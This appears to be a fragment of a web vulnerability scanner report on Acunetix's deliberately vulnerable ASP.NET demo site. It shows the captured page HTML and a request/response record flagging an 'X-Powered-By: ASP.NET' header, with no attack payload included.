value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEMuJR47/37fBoWsDm+8pRHDKDZX" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
Method	POST
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Content-Length: 6529 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,529 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivn